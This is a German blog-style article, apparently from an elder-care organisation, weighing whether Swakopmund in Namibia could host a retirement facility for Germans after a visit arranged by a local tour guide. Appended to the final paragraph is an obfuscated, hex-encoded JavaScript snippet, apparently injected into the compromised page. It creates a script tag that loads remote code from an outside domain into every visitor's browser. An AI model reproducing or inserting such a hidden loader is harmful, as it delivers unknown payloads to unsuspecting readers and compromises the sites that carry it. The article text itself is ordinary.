Helfen ist bei uns Herzenssache
Helfen ist bei uns Herzenssache

Ist Namibia eine Lösung für ein Leben im Alter oder ist die „Safari für immer“ nur ein Urlaubstraum?

19.02.2018

Mit dieser Fragestellung ist Heiner Deutschmann, ein in Swakopmund lebender Reiseleiter, an uns herangetreten und hat mich dabei zu einem Besuch in sein Heimatland eingeladen.

„Ich habe bereits über 100 Adressen von Interessierten“ berichtet er mir stolz vor Ort. Alle sind Deutsche, waren mit ihm auf Safari und haben spontan erklärt, sie würden gerne ihren Lebensabend in Afrika verbringen, wenn es da dann eine entsprechende Struktur gäbe.

Angeregt durch diese Anfragen ist Deutschmann nun auf der Suche nach entsprechenden Partnern auch aus der Altenhilfe, die mit ihm gemeinsam weiterdenken, ob daraus ein Projekt entstehen könnte, welches diese Nachfrage bedienen kann.

Nun kann ich nach nur fünf Tagen in Namibia dazu natürlich kein abschließendes Urteil abgeben. Vieles aber hat mich zum Nachdenken gebracht und ein erstes Meinungsbild möchte ich wie folgt beschreiben.

Zunächst ist Swakopmund aus deutscher Sicht nun nicht gerade um die Ecke, ich persönlich habe mich jedoch im Ausland nie deutscher gefühlt als dort. Angefangen von den Straßennamen bis hin zur „Schwartau“ Marmelade in den Regalen der Supermärkte, stellt sich geschichtlich bedingt doch schnell ein heimatliches Gefühl ein.

Im Gegensatz zu Deutschland besteht ein durchgängig sehr angenehmes Klima mit ca. 18 – 25 Grad, welches dazu einlädt sich ganzjährig an der frischen Luft aufzuhalten.

 

 

Die ärztliche Versorgung ist hervorragend, für spezielle Probleme reisen Ärzte aus Kapstadt an und führen Behandlungen vor Ort durch.

Geschichtlich bedingt wird vielerorts noch Deutsch gesprochen, Swakopmund selber ähnelt eher einem deutschen Ostseebad als einer Kleinstadt in Afrika.

Bedingt durch die niedrigen Lebenshaltungs- und vor allem Personalkosten, ist eine guter Lebensstandard und eine Versorgung im Alter auch bei Pflegebedürftigkeit mit einem für deutsche Verhältnisse eher niedrigem Einkommen/Rente absolut darstellbar.

Daher kann ich mir durchaus vorstellen, dass es ein entsprechend ausgestattetes Angebot vor Ort für Menschen, die ihren Lebensabend in Namibia verbringen möchten, eine Nachfrage in Deutschland hat.

Ob alle hundert Adressaten von Heiner Deutschmann nachhaltiges Interesse haben, wird sich zeigen, ein entsprechendes Anschreiben mit einer Projektskizze von uns und auch einem Planentwurf eines örtlichen Architekten werden auf jeden Fall alle in Kürze erhalten.

Sollten daraufhin ernsthafte Interessenbekundungen entstehen, werden wir auf jeden Fall unsere Expertise aus der Altenhilfe weiter einbringen, um das Projekt zu befördern.

Abgesehen von dem Interesse am Projekt an sich, sehe ich dabei für uns durchaus die Möglichkeit durch internationale Beziehungen unsere Arbeitgeberattraktivität zu steigern und damit letztlich den Standort und die Versorgung vor Ort zu sichern.

Und zuletzt noch etwas Persönliches:

Namibia ist ein aufregendes Land und Heiner Deutschmann und seine Frau sind zwei wunderbare Menschen. Und alleine das war und ist für mich eine Reise wert. var _0x29b4=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64“];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

nach oben
Um Ihnen bei Ihrem Besuch auf unserer Webseite den bestmöglichen Service und die höchstmögliche Benutzerfreundlichkeit gewährleisten zu können, verwendet unsere Website Cookies. Wenn Sie unsere Website weiter nutzen, stimmen Sie der Speicherung von Cookies zu. Mehr Informationen finden Sie in unserer Datenschutzerklärung.